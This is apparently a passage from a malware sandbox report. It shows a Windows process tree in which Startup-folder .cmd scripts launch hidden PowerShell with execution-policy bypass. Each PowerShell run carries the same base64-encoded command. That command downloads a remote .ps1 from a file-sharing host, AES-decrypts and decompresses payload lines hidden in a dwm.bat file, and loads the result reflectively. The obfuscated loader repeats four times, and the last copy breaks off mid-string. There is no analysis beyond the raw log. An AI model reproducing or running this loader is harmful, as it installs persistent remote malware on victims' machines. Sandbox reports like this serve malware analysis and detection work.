    • conhost.exe (PID: 1548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6024 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6556 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5668 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5660 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2528 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 4792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 364 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3808 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5380 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5464 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5472 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PV